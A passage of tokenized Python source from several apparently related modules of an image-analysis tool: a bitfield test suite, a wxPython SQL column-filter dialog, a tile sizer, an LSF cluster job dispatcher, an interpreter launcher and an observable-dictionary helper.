array <EOL> t = reverse_lookup_table <EOL> s = len ( booleans ) % <NUM_LIT:8> <EOL> r = [ t [ tuple ( booleans [ x : x + <NUM_LIT:8> ] ) ] for x in xrange ( <NUM_LIT:0> , len ( booleans ) - s , <NUM_LIT:8> ) ] <EOL> if s : <EOL> r += t [ tuple ( booleans [ - s : ] + ( [ <NUM_LIT:0> ] * ( <NUM_LIT:8> - s ) ) ) ] <EOL> return '<STR_LIT>' . join ( r ) <EOL> def complete ( self ) : <EOL> return not self . numfalse <EOL> def test_bitfield ( ) : <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:9> , '<STR_LIT:abc>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:0> , '<STR_LIT:a>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:1> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:8> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:9> , '<STR_LIT:a>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , chr ( <NUM_LIT:1> ) ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:9> , chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> assert Bitfield ( <NUM_LIT:0> , '<STR_LIT>' ) . tostring ( ) == '<STR_LIT>' <EOL> assert Bitfield ( <NUM_LIT:1> , chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT> ) <EOL> assert Bitfield ( <NUM_LIT:7> , chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT> ) <EOL> assert Bitfield ( <NUM_LIT:8> , chr ( <NUM_LIT> ) ) . 
tostring ( ) == chr ( <NUM_LIT> ) <EOL> assert Bitfield ( <NUM_LIT:9> , chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:1> ) <EOL> assert x . numfalse == <NUM_LIT:1> <EOL> x [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:0> <EOL> x [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:0> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:7> ) <EOL> assert len ( x ) == <NUM_LIT:7> <EOL> x [ <NUM_LIT:6> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:6> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:8> ) <EOL> x [ <NUM_LIT:7> ] = <NUM_LIT:1> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT:1> ) <EOL> x = Bitfield ( <NUM_LIT:9> ) <EOL> x [ <NUM_LIT:8> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:8> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:8> , chr ( <NUM_LIT> ) ) <EOL> assert len ( x ) == <NUM_LIT:8> <EOL> assert x . numfalse == <NUM_LIT:5> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT> ) </s>
<s> import wx <EOL> import re <EOL> import sqltools as sql <EOL> from properties import Properties <EOL> from dbconnect import DBConnect <EOL> from wx . combo import OwnerDrawnComboBox as ComboBox <EOL> p = Properties . getInstance ( ) <EOL> db = DBConnect . getInstance ( ) <EOL> class ColumnFilterPanel ( wx . Panel ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , parent , tables , allow_delete = True , expression = None , ** kwargs ) : <EOL> wx . Panel . __init__ ( self , parent , ** kwargs ) <EOL> self . fieldSets = [ ] <EOL> self . tables = tables <EOL> self . types = { } <EOL> self . types [ p . image_table ] = db . GetColumnTypes ( p . image_table ) <EOL> self . tableChoice = ComboBox ( self , choices = self . tables , size = ( <NUM_LIT> , - <NUM_LIT:1> ) , style = wx . CB_READONLY ) <EOL> self . tableChoice . Select ( <NUM_LIT:0> ) <EOL> self . colChoice = ComboBox ( self , choices = db . GetColumnNames ( p . image_table ) , size = ( <NUM_LIT> , - <NUM_LIT:1> ) , style = wx . CB_READONLY ) <EOL> self . colChoice . Select ( <NUM_LIT:0> ) <EOL> self . comparatorChoice = ComboBox ( self , size = ( <NUM_LIT> , - <NUM_LIT:1> ) ) <EOL> self . update_comparator_choice ( ) <EOL> self . valueField = wx . ComboBox ( self , - <NUM_LIT:1> , value = '<STR_LIT>' ) <EOL> if allow_delete : <EOL> self . x_btn = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT:x>' , size = ( <NUM_LIT:30> , - <NUM_LIT:1> ) ) <EOL> colSizer = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> colSizer . Add ( self . tableChoice , <NUM_LIT:1> , wx . EXPAND ) <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . colChoice , <NUM_LIT:1> , wx . EXPAND ) <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . comparatorChoice , <NUM_LIT:0.5> , wx . EXPAND ) <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . valueField , <NUM_LIT:1> , wx . EXPAND ) <EOL> if allow_delete : <EOL> colSizer . 
AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . x_btn , <NUM_LIT:0> , wx . EXPAND ) <EOL> self . SetSizer ( colSizer ) <EOL> self . tableChoice . Bind ( wx . EVT_COMBOBOX , self . on_select_table ) <EOL> self . colChoice . Bind ( wx . EVT_COMBOBOX , self . on_select_col ) <EOL> if allow_delete : <EOL> self . x_btn . Bind ( wx . EVT_BUTTON , self . on_remove ) <EOL> self . Fit ( ) <EOL> def on_remove ( self , evt ) : <EOL> self . GrandParent . remove ( self ) <EOL> def on_select_col ( self , evt ) : <EOL> self . update_comparator_choice ( ) <EOL> self . update_value_choice ( ) <EOL> def on_select_table ( self , evt ) : <EOL> self . update_col_choice ( ) <EOL> self . update_comparator_choice ( ) <EOL> self . update_value_choice ( ) <EOL> def update_col_choice ( self ) : <EOL> table = self . tableChoice . Value <EOL> self . colChoice . SetItems ( db . GetColumnNames ( table ) ) <EOL> self . colChoice . Select ( <NUM_LIT:0> ) <EOL> def _get_col_type ( self ) : <EOL> table = self . tableChoice . Value <EOL> colidx = self . colChoice . GetSelection ( ) <EOL> return db . GetColumnTypes ( table ) [ colidx ] <EOL> def update_comparator_choice ( self ) : <EOL> coltype = self . _get_col_type ( ) <EOL> comparators = [ ] <EOL> if coltype in [ str , unicode ] : <EOL> comparators = [ '<STR_LIT:=>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if coltype in [ int , float , long ] : <EOL> comparators = [ '<STR_LIT:=>' , '<STR_LIT>' , '<STR_LIT:<>' , '<STR_LIT:>>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . comparatorChoice . SetItems ( comparators ) <EOL> self . comparatorChoice . Select ( <NUM_LIT:0> ) <EOL> def update_value_choice ( self ) : <EOL> table = self . tableChoice . Value <EOL> column = self . colChoice . Value <EOL> colidx = self . colChoice . GetSelection ( ) <EOL> coltype = db . GetColumnTypes ( table ) [ colidx ] <EOL> vals = [ ] <EOL> self . valueField . 
SetItems ( vals ) <EOL> def get_filter ( self ) : <EOL> table = self . tableChoice . Value <EOL> column = self . colChoice . Value <EOL> comparator = self . comparatorChoice . GetValue ( ) <EOL> value = self . valueField . GetValue ( ) <EOL> if self . _get_col_type ( ) in [ int , float , long ] : <EOL> return sql . Filter ( sql . Column ( table , column ) , comparator , '<STR_LIT:%s>' % ( value ) ) <EOL> if comparator . upper ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] and value . upper ( ) == '<STR_LIT>' : <EOL> return sql . Filter ( sql . Column ( table , column ) , comparator , '<STR_LIT:%s>' % ( value ) ) <EOL> return sql . Filter ( sql . Column ( table , column ) , comparator , '<STR_LIT>' % ( value ) ) <EOL> class ColumnFilterDialog ( wx . Dialog ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , parent , tables , ** kwargs ) : <EOL> wx . Dialog . __init__ ( self , parent , - <NUM_LIT:1> , style = wx . DEFAULT_DIALOG_STYLE | wx . RESIZE_BORDER , ** kwargs ) <EOL> self . tables = tables <EOL> self . conjunctions = [ ] <EOL> self . filter_name = wx . TextCtrl ( self , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . addbtn = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . ok = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT:OK>' ) <EOL> self . cancel = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . Sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> sz = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> sz . Add ( wx . StaticText ( self , - <NUM_LIT:1> , '<STR_LIT>' ) , <NUM_LIT:0> , wx . CENTER ) <EOL> sz . Add ( self . filter_name , <NUM_LIT:1> , wx . EXPAND ) <EOL> self . Sizer . Add ( sz , <NUM_LIT:0> , wx . EXPAND | wx . ALL , <NUM_LIT:5> ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> self . Sizer . Add ( wx . StaticText ( self , - <NUM_LIT:1> , '<STR_LIT>' ) , <NUM_LIT:0> , wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:10> ) ) <EOL> self . sw = wx . 
ScrolledWindow ( self ) <EOL> self . panels = [ ColumnFilterPanel ( self . sw , tables , False ) ] <EOL> self . sw . Sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> ( w , h ) = self . sw . Sizer . GetSize ( ) <EOL> self . sw . SetScrollbars ( <NUM_LIT:20> , <NUM_LIT:20> , w / <NUM_LIT:20> , h / <NUM_LIT:20> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . sw . Sizer . Add ( self . panels [ <NUM_LIT:0> ] , <NUM_LIT:0> , wx . EXPAND | wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . Sizer . Add ( self . sw , <NUM_LIT:1> , wx . EXPAND ) <EOL> sz = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> sz . AddSpacer ( ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) <EOL> sz . Add ( self . addbtn , <NUM_LIT:0> ) <EOL> sz . AddStretchSpacer ( ) <EOL> sz . Add ( self . ok , <NUM_LIT:0> ) <EOL> sz . AddSpacer ( ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) <EOL> sz . Add ( self . cancel , <NUM_LIT:0> ) <EOL> sz . AddSpacer ( ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:10> ) ) <EOL> self . Sizer . Add ( sz , <NUM_LIT:0> , wx . EXPAND ) <EOL> self . Sizer . AddSpacer ( ( - <NUM_LIT:1> , <NUM_LIT:10> ) ) <EOL> self . validate_filter_name ( ) <EOL> self . addbtn . Bind ( wx . EVT_BUTTON , self . on_add_column ) <EOL> self . ok . Bind ( wx . EVT_BUTTON , self . on_ok ) <EOL> self . cancel . Bind ( wx . EVT_BUTTON , self . on_cancel ) <EOL> self . filter_name . Bind ( wx . EVT_TEXT , self . validate_filter_name ) <EOL> self . resize_to_fit ( ) <EOL> def reset ( self ) : <EOL> for panel in self . panels [ <NUM_LIT:1> : ] : <EOL> self . remove ( panel ) <EOL> self . Refresh ( ) <EOL> def on_ok ( self , evt ) : <EOL> self . EndModal ( wx . OK ) <EOL> def on_cancel ( self , evt ) : <EOL> self . EndModal ( wx . CANCEL ) <EOL> def validate_filter_name ( self , evt = None ) : <EOL> name = self . get_filter_name ( ) <EOL> self . ok . Enable ( ) <EOL> self . filter_name . SetForegroundColour ( '<STR_LIT>' ) <EOL> if ( name in p . _filters <EOL> or name in p . 
gates <EOL> or not re . match ( '<STR_LIT>' , name ) ) : <EOL> self . ok . Disable ( ) <EOL> self . filter_name . SetForegroundColour ( '<STR_LIT>' ) <EOL> def get_filter ( self ) : <EOL> fltr = self . panels [ <NUM_LIT:0> ] . get_filter ( ) <EOL> for i , conj in enumerate ( self . conjunctions ) : <EOL> fltr . append_expression ( conj . GetStringSelection ( ) , <EOL> * self . panels [ i + <NUM_LIT:1> ] . get_filter ( ) . get_token_list ( ) ) <EOL> return fltr <EOL> def get_filter_name ( self ) : <EOL> return str ( self . filter_name . Value ) <EOL> def remove ( self , panel ) : <EOL> i = self . panels . index ( panel ) <EOL> if <NUM_LIT:0> < i <= len ( self . conjunctions ) : <EOL> self . sw . Sizer . Remove ( self . conjunctions [ i - <NUM_LIT:1> ] ) <EOL> self . conjunctions . pop ( i - <NUM_LIT:1> ) . Destroy ( ) <EOL> self . Sizer . Remove ( panel ) <EOL> self . panels . remove ( panel ) <EOL> panel . Destroy ( ) <EOL> self . sw . FitInside ( ) <EOL> self . resize_to_fit ( ) <EOL> def on_add_column ( self , evt ) : <EOL> self . add_column ( ) <EOL> def add_column ( self , conjunction = '<STR_LIT>' , expression = None ) : <EOL> '''<STR_LIT>''' <EOL> self . panels += [ ColumnFilterPanel ( self . sw , self . tables , expression = expression ) ] <EOL> self . conjunctions += [ wx . Choice ( self . sw , - <NUM_LIT:1> , choices = [ '<STR_LIT>' , '<STR_LIT>' ] ) ] <EOL> self . conjunctions [ - <NUM_LIT:1> ] . SetStringSelection ( conjunction ) <EOL> self . sw . Sizer . Add ( self . conjunctions [ - <NUM_LIT:1> ] , <NUM_LIT:0> , wx . CENTER | wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . sw . Sizer . Add ( self . panels [ - <NUM_LIT:1> ] , <NUM_LIT:0> , wx . EXPAND | wx . BOTTOM | wx . LEFT | wx . RIGHT , <NUM_LIT:5> ) <EOL> self . sw . FitInside ( ) <EOL> self . resize_to_fit ( ) <EOL> def resize_to_fit ( self ) : <EOL> w = min ( self . sw . Sizer . MinSize [ <NUM_LIT:0> ] + self . Sizer . MinSize [ <NUM_LIT:0> ] , <EOL> wx . 
GetDisplaySize ( ) [ <NUM_LIT:0> ] - self . Position [ <NUM_LIT:0> ] ) <EOL> h = min ( self . sw . Sizer . MinSize [ <NUM_LIT:1> ] + self . Sizer . MinSize [ <NUM_LIT:1> ] , <EOL> wx . GetDisplaySize ( ) [ <NUM_LIT:1> ] - self . Position [ <NUM_LIT:1> ] ) <EOL> self . SetSize ( ( w , h + <NUM_LIT:7> ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> app = wx . PySimpleApp ( ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> propsFile = sys . argv [ <NUM_LIT:1> ] <EOL> p . LoadFile ( propsFile ) <EOL> else : <EOL> p . LoadFile ( '<STR_LIT>' ) <EOL> p . _filters [ '<STR_LIT:test>' ] = sql . Filter ( ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , sql . Column ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> p . _filters_ordered += [ '<STR_LIT:test>' ] <EOL> p . _filters [ '<STR_LIT>' ] = sql . Filter ( ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> p . _filters_ordered += [ '<STR_LIT>' ] <EOL> cff = ColumnFilterDialog ( None , tables = [ p . image_table ] ) <EOL> if cff . ShowModal ( ) == wx . OK : <EOL> print cff . get_filter ( ) <EOL> cff . Destroy ( ) <EOL> app . MainLoop ( ) </s>
<s> '''<STR_LIT>''' <EOL> import wx <EOL> import math <EOL> class ImageTileSizer ( wx . PySizer ) : <EOL> def __init__ ( self ) : <EOL> wx . PySizer . __init__ ( self ) <EOL> def pitch ( self ) : <EOL> sizes = [ c . GetSize ( ) + wx . Size ( <NUM_LIT:2> * c . GetBorder ( ) , <NUM_LIT:2> * c . GetBorder ( ) ) <EOL> for c in self . GetChildren ( ) ] <EOL> if sizes == [ ] : <EOL> return None <EOL> else : <EOL> return max ( sizes ) <EOL> def CalcMin ( self ) : <EOL> n = len ( self . GetChildren ( ) ) <EOL> if n > <NUM_LIT:0> : <EOL> width = self . GetContainingWindow ( ) . GetClientSize ( ) . GetWidth ( ) <EOL> self . columns = max ( <NUM_LIT:1> , width / self . pitch ( ) . x ) <EOL> self . rows = math . ceil ( <NUM_LIT:1.0> * n / self . columns ) <EOL> pitch = self . pitch ( ) <EOL> return wx . Size ( self . columns * pitch . x , self . rows * pitch . y ) <EOL> else : <EOL> return wx . Size ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def RecalcSizes ( self ) : <EOL> self . CalcMin ( ) <EOL> origin = self . GetPosition ( ) <EOL> pitch = self . pitch ( ) <EOL> for k , item in enumerate ( self . GetChildren ( ) ) : <EOL> i = k / self . columns <EOL> j = k % self . columns <EOL> pos = origin + wx . Point ( j * pitch . x , i * pitch . y ) <EOL> item = self . GetChildren ( ) [ i * self . columns + j ] <EOL> border = item . GetBorder ( ) <EOL> item . SetDimension ( pos + wx . Point ( border , border ) , item . GetSize ( ) ) </s>
<s> import types <EOL> import errno <EOL> import re <EOL> import random <EOL> import sys <EOL> import time <EOL> import pickle <EOL> import marshal <EOL> import os <EOL> import tempfile <EOL> import progressbar <EOL> import traceback <EOL> class LSF ( object ) : <EOL> def __init__ ( self , njobs , directory = None , memory = None , job_array_name = '<STR_LIT>' ) : <EOL> self . njobs = njobs <EOL> self . memory = memory <EOL> self . job_array_name = job_array_name <EOL> if directory is None : <EOL> self . directory = tempfile . mkdtemp ( dir = '<STR_LIT:.>' ) <EOL> else : <EOL> self . directory = directory <EOL> if not os . path . exists ( self . directory ) : <EOL> os . mkdir ( self . directory ) <EOL> def view ( self , name ) : <EOL> return LSFView ( self . njobs , os . path . join ( self . directory , name ) , self . memory , self . job_array_name ) <EOL> class LSFView ( object ) : <EOL> def __init__ ( self , njobs , directory = None , memory = None , job_array_name = '<STR_LIT>' ) : <EOL> self . njobs = njobs <EOL> self . memory = memory <EOL> self . job_array_name = job_array_name <EOL> if directory is None : <EOL> self . directory = tempfile . mkdtemp ( dir = '<STR_LIT:.>' ) <EOL> self . resuming = False <EOL> else : <EOL> self . directory = directory <EOL> self . resuming = os . path . exists ( self . directory ) <EOL> if not self . resuming : <EOL> os . mkdir ( self . directory ) <EOL> def create_subdirectories ( self ) : <EOL> for subdir in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> path = os . path . join ( self . directory , subdir ) <EOL> os . mkdir ( path ) <EOL> def start_workers ( self ) : <EOL> args = [ '<STR_LIT>' ] <EOL> if self . memory : <EOL> args . extend ( [ '<STR_LIT>' , '<STR_LIT>' % int ( self . memory ) ] ) <EOL> args . extend ( [ '<STR_LIT>' , '<STR_LIT>' % ( self . job_array_name , self . njobs ) , '<STR_LIT>' , <EOL> '<STR_LIT>' % self . directory , sys . 
executable , <EOL> '<STR_LIT>' , '<STR_LIT>' , self . directory ] ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) <EOL> print cmd <EOL> os . system ( cmd ) <EOL> def list_precomputed_results ( self ) : <EOL> return set ( int ( re . match ( '<STR_LIT>' , fn ) . group ( <NUM_LIT:1> ) ) <EOL> for fn in os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) ) <EOL> def submit_task ( self , task_id , task_dict ) : <EOL> basename = '<STR_LIT>' % task_id <EOL> tmp_filename = os . path . join ( self . directory , '<STR_LIT>' , basename ) <EOL> with open ( tmp_filename , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( task_dict , f ) <EOL> os . rename ( tmp_filename , os . path . join ( self . directory , '<STR_LIT>' , basename ) ) <EOL> def signal_done_submitting ( self ) : <EOL> open ( os . path . join ( self . directory , '<STR_LIT>' ) , '<STR_LIT:w>' ) . close ( ) <EOL> def progress ( self , s , n ) : <EOL> return progressbar . ProgressBar ( widgets = [ s , progressbar . Percentage ( ) , <EOL> '<STR_LIT:U+0020>' , progressbar . Bar ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . Counter ( ) , '<STR_LIT:/>' , <EOL> str ( n ) , '<STR_LIT:U+0020>' , progressbar . ETA ( ) ] , <EOL> maxval = n ) <EOL> def read_results ( self , task_id ) : <EOL> with open ( os . path . join ( self . directory , '<STR_LIT>' , '<STR_LIT>' % task_id ) ) as f : <EOL> results = pickle . load ( f ) [ '<STR_LIT:result>' ] <EOL> for r in results : <EOL> yield r <EOL> def imap ( self , function , parameters ) : <EOL> if not self . resuming : <EOL> self . create_subdirectories ( ) <EOL> self . start_workers ( ) <EOL> done_tasks = self . list_precomputed_results ( ) <EOL> batch_size = <NUM_LIT:1> + len ( parameters ) // <NUM_LIT> <EOL> print '<STR_LIT>' , batch_size <EOL> all_batches = [ ] <EOL> while parameters : <EOL> all_batches . 
append ( parameters [ : batch_size ] ) <EOL> parameters = parameters [ batch_size : ] <EOL> batches = [ ( task_id , batch ) <EOL> for task_id , batch in enumerate ( all_batches ) <EOL> if task_id not in done_tasks ] <EOL> if len ( batches ) > <NUM_LIT:0> : <EOL> progress = self . progress ( '<STR_LIT>' , len ( batches ) ) <EOL> for task_id , batch in progress ( batches ) : <EOL> self . submit_task ( task_id , dict ( function = marshal . dumps ( function . func_code ) , <EOL> batch = batch , <EOL> task_id = task_id , attempts = <NUM_LIT:3> ) ) <EOL> self . signal_done_submitting ( ) <EOL> next = <NUM_LIT:0> <EOL> while True : <EOL> try : <EOL> npending = len ( os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) ) <EOL> nrunning = len ( os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) ) <EOL> except OSError , e : <EOL> if e . errno == errno . EIO : <EOL> continue <EOL> else : <EOL> raise <EOL> for fn in os . listdir ( os . path . join ( self . directory , '<STR_LIT>' ) ) : <EOL> task_id = int ( re . match ( '<STR_LIT>' , fn ) . group ( <NUM_LIT:1> ) ) <EOL> if task_id not in done_tasks : <EOL> done_tasks . add ( task_id ) <EOL> while next in done_tasks : <EOL> for r in self . read_results ( next ) : <EOL> yield r <EOL> next += <NUM_LIT:1> <EOL> if next == len ( all_batches ) : <EOL> return <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def test_function ( ( seconds ) ) : <EOL> import time <EOL> time . sleep ( seconds ) <EOL> return seconds <EOL> def test ( ) : <EOL> view = LSFView ( <NUM_LIT:3> , '<STR_LIT>' ) <EOL> print view . directory <EOL> for result in view . imap ( test_function , [ random . randint ( <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> for task in range ( <NUM_LIT:10> ) ] ) : <EOL> print '<STR_LIT>' , result <EOL> class Worker ( object ) : <EOL> def __init__ ( self , directory , job_id , array_index ) : <EOL> self . directory = directory <EOL> self . job_id = job_id <EOL> self . array_index = array_index <EOL> self . 
start_time = time . time ( ) <EOL> def run ( self ) : <EOL> while True : <EOL> task = self . get_task ( ) <EOL> if task is None : <EOL> print '<STR_LIT>' <EOL> break <EOL> task_id = task [ '<STR_LIT>' ] <EOL> print '<STR_LIT>' , task_id <EOL> start_time = time . time ( ) <EOL> try : <EOL> code = marshal . loads ( task [ '<STR_LIT>' ] ) <EOL> function = types . FunctionType ( code , globals ( ) , "<STR_LIT>" ) <EOL> result = map ( function , task [ '<STR_LIT>' ] ) <EOL> except : <EOL> traceback . print_exc ( None , sys . stderr ) <EOL> if task [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> task [ '<STR_LIT>' ] -= <NUM_LIT:1> <EOL> with open ( self . filename ( '<STR_LIT>' , task_id ) , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( task , f ) <EOL> os . rename ( self . filename ( '<STR_LIT>' , task_id ) , <EOL> self . filename ( '<STR_LIT>' , task_id ) ) <EOL> else : <EOL> os . rename ( self . filename ( '<STR_LIT>' , task_id ) , <EOL> self . filename ( '<STR_LIT>' , task_id ) ) <EOL> continue <EOL> end_time = time . time ( ) <EOL> done = dict ( start_time = start_time , end_time = end_time , <EOL> elapsed = end_time - start_time , task_id = task_id , <EOL> job_id = self . job_id , array_index = self . array_index , <EOL> uname = os . uname ( ) , result = result ) <EOL> with open ( self . filename ( '<STR_LIT>' , task_id ) , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( done , f ) <EOL> os . rename ( self . filename ( '<STR_LIT>' , task_id ) , self . filename ( '<STR_LIT>' , task_id ) ) <EOL> os . unlink ( self . filename ( '<STR_LIT>' , task_id ) ) <EOL> if self . is_too_old ( ) : <EOL> print "<STR_LIT>" <EOL> break <EOL> def filename ( self , subdir , task_id ) : <EOL> if subdir == '<STR_LIT>' : <EOL> basename = '<STR_LIT>' % ( self . job_id , self . array_index , task_id ) <EOL> else : <EOL> basename = '<STR_LIT>' % task_id <EOL> return os . path . join ( self . directory , subdir , basename ) <EOL> def get_task ( self ) : <EOL> while True : <EOL> tasks = os . listdir ( os . 
path . join ( self . directory , '<STR_LIT>' ) ) <EOL> if len ( tasks ) == <NUM_LIT:0> : <EOL> if os . path . exists ( os . path . join ( self . directory , '<STR_LIT>' ) ) : <EOL> return None <EOL> else : <EOL> print '<STR_LIT>' <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> task_basename = tasks [ random . randint ( <NUM_LIT:0> , len ( tasks ) - <NUM_LIT:1> ) ] <EOL> new_filename = os . path . join ( self . directory , '<STR_LIT>' , task_basename ) <EOL> try : <EOL> with open ( new_filename ) as f : <EOL> task = pickle . load ( f ) <EOL> task_id = task [ '<STR_LIT>' ] <EOL> cur_filename = self . filename ( '<STR_LIT>' , task_id ) <EOL> os . rename ( new_filename , cur_filename ) <EOL> return task <EOL> except IOError , e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> except OSError , e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> def is_too_old ( self ) : <EOL> elapsed = time . time ( ) - self . start_time <EOL> return elapsed >= <NUM_LIT> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) == <NUM_LIT:2> : <EOL> directory = sys . argv [ <NUM_LIT:1> ] <EOL> job_id = int ( os . environ [ '<STR_LIT>' ] ) <EOL> array_index = int ( os . environ [ '<STR_LIT>' ] ) <EOL> worker = Worker ( directory , job_id , array_index ) <EOL> worker . run ( ) <EOL> elif len ( sys . argv ) == <NUM_LIT:1> : <EOL> test ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import code <EOL> import sys <EOL> from optparse import OptionParser <EOL> import cpa <EOL> import cpa . properties <EOL> import cpa . dbconnect <EOL> parser = OptionParser ( "<STR_LIT>" ) <EOL> options , args = parser . parse_args ( ) <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> cpa . properties . LoadFile ( sys . argv [ <NUM_LIT:1> ] ) <EOL> variables = { '<STR_LIT>' : cpa } <EOL> if len ( args ) == <NUM_LIT:2> : <EOL> interpreter = code . InteractiveInterpreter ( locals = variables ) <EOL> interpreter . runsource ( sys . argv [ <NUM_LIT:2> ] ) <EOL> else : <EOL> code . interact ( local = variables ) </s>
<s> class Observable : <EOL> '''<STR_LIT>''' <EOL> _observers = None <EOL> def addobserver ( self , observer ) : <EOL> if not self . _observers : <EOL> self . _observers = [ ] <EOL> self . _observers . append ( observer ) <EOL> def removeobserver ( self , observer ) : <EOL> if observer in self . _observers : <EOL> self . _observers . remove ( observer ) <EOL> def notify ( self , event ) : <EOL> for o in self . _observers or ( ) : <EOL> o ( event ) <EOL> class ObservableDict ( dict , Observable ) : <EOL> def __setitem__ ( self , key , value ) : <EOL> dict . __setitem__ ( self , key , value ) <EOL> self . notify ( ( key , value ) ) <EOL> def __delitem__ ( self , key ) : <EOL> dict . __delitem__ ( self , key ) <EOL> self . notify ( ( key , None ) ) <EOL> def pop ( self , key ) : <EOL> v = dict . pop ( self , key ) <EOL> self . notify ( ( key , None ) ) <EOL> return v <EOL> def clear ( self ) : <EOL> dict . clear ( self ) <EOL> self . notify ( None ) <EOL> import threading <EOL> from functools import wraps <EOL> def delay ( delay = 